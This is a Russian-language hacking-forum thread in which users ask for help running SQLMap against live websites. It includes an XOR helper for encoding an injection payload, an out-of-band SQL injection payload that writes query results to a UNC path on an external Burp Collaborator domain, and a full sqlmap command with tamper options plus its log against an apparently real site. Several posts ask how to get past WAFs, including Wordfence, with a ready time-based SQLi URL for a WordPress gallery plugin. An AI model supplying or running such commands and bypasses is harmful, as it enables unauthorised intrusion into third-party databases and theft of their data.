Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    244
    Likes Received:
    93
    Reputations:
    6
    Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз

    def CB_XORm(data, key):
    j=0
    key = list(key)
    data = list(data)
    tmp = list()
    for i in range(len(data)):
    tmp.append(chr(ord(data)^ord(key[j])))
    j += 1
    if j > (len(key)-1):
    j = 0
    return "".join(tmp)
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    В настройках терминала
     
    erwerr2321 likes this.
  3. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    _on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5c%5caju'%3b%20--%20

    n parameter appears to be vulnerable to SQL injection attacks. The payload into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net\\aju'; -- was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.


    как крутануть такую скулю?мап не берет(
     
    #983 brown, 24 Dec 2019
    Last edited: 24 Dec 2019
  4. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    244
    Likes Received:
    93
    Reputations:
    6
    Я как понял ни кто мне не подскажет
     
  5. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Если вы знаете key, то прогоните ваш payload через эту же фукнцию и получите зашифрованный payload, который вы отправяете серверу.
     
    Eidolon likes this.
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
     
  7. madik

    madik Member

    Joined:
    4 May 2017
    Messages:
    244
    Likes Received:
    93
    Reputations:
    6
    поподробнее можно?
     
  8. RedHazard

    RedHazard Banned

    Joined:
    17 Apr 2011
    Messages:
    70
    Likes Received:
    14
    Reputations:
    8
    Народ напишите пожалуйста команды
    sql-shell , типа:
    - вывести все таблицы с базы
    простой синтаксис sql не хочет работать.
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Что?
     
  10. RedHazard

    RedHazard Banned

    Joined:
    17 Apr 2011
    Messages:
    70
    Likes Received:
    14
    Reputations:
    8
    upload_2020-1-28_1-31-32.png
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  12. RedHazard

    RedHazard Banned

    Joined:
    17 Apr 2011
    Messages:
    70
    Likes Received:
    14
    Reputations:
    8
    ты наверное не увидел моего вопроса ?

     
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Если простой sql синиакс не работает, то тебе никто не поможет.
     
    fandor9 likes this.
  14. none222

    none222 Guest

    Reputations:
    0
    █▓███████▓▓╬╬╬╬╬╬╬╬╬╬╬╬▓███▓▓▓▓█▓╬╬╬▓█
    ███████▓█████▓▓╬╬╬╬╬╬╬╬▓███▓╬╬╬╬╬╬╬▓╬╬▓█
    ████▓▓▓▓╬╬▓█████╬╬╬╬╬╬███▓╬╬╬╬╬╬╬╬╬╬╬╬╬█
    ███▓▓▓▓╬╬╬╬╬╬▓██╬╬╬╬╬╬▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    ████▓▓▓╬╬╬╬╬╬╬▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    ███▓█▓███████▓▓███▓╬╬╬╬╬╬▓███████▓╬╬╬╬▓█
    ████████████████▓█▓╬╬╬╬╬▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬█
    ███▓▓▓▓▓▓▓╬╬▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    ████▓▓▓╬╬╬╬▓▓▓▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    ███▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    █████▓▓▓▓▓▓▓▓█▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█
    █████▓▓▓▓▓▓▓██▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
    █████▓▓▓▓▓████▓▓▓█▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
    ████▓█▓▓▓▓██▓▓▓▓██╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬██
    ████▓▓███▓▓▓▓▓▓▓██▓╬╬╬╬╬╬╬╬╬╬╬╬█▓╬▓╬╬▓██
    █████▓███▓▓▓▓▓▓▓▓████▓▓╬╬╬╬╬╬╬█▓╬╬╬╬╬▓██
    █████▓▓█▓███▓▓▓████╬▓█▓▓╬╬╬▓▓█▓╬╬╬╬╬╬███
    ██████▓██▓███████▓╬╬╬▓▓╬▓▓██▓╬╬╬╬╬╬╬▓███
    ███████▓██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬████
    ███████▓▓██▓▓▓▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓████
    ████████▓▓▓█████▓▓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬▓█████
    █████████▓▓▓█▓▓▓▓▓███▓╬╬╬╬╬╬╬╬╬╬╬▓██████
    ██████████▓▓▓█▓▓▓╬▓██╬╬╬╬╬╬╬╬╬╬╬▓███████
    ███████████▓▓█▓▓▓▓███▓╬╬╬╬╬╬╬╬╬▓████████
    ██████████████▓▓▓███▓▓╬╬╬╬╬╬╬╬██████████
    Источник: http://textovie-kartinki.smeha.net/
     
    #994 none222, 3 Feb 2020
    Last edited by a moderator: 6 Nov 2020
  15. yuriy_ivanov

    yuriy_ivanov New Member

    Joined:
    27 Sep 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    на слепую скорее всего прога выдала ложный вывод , добавь в строку --banner --fresh-queries .
    как вариант ,запустить через ТОР + верболзция=3 , смотреть на что ругается и символы корректировать
     
  16. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Люди добрые ,подскажите ввожу
    sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
    получаю, имя бд
    available databases [1]:
    [*] bd_upgrade_live
    далее ввожу
    sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables

    таблица не выводит,пишет
    [08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
    ---
    [08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [08:12:55] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5
    [08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
    [08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
    [08:13:01] [INFO] retrieved:
    [08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

    [08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
    [08:13:03] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    No tables found
    [08:14:27] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 3 times
    [08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx'

    [*] ending @ 08:14:27 /2020-02-06/


    Обьясните пожалуйста почему так?
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер
     
    _________________________
  18. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    не может быть. Попробуйте поставить *
     
  20. Andrey979

    Andrey979 New Member

    Joined:
    20 Sep 2019
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)
    Но в браузере пишет
    403 Forbidden
    A potentially unsafe operation has been detected in your request to this site
    Как обойти этот WAF мапом?

    Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
     
    #1000 Andrey979, 7 Feb 2020
    Last edited: 7 Feb 2020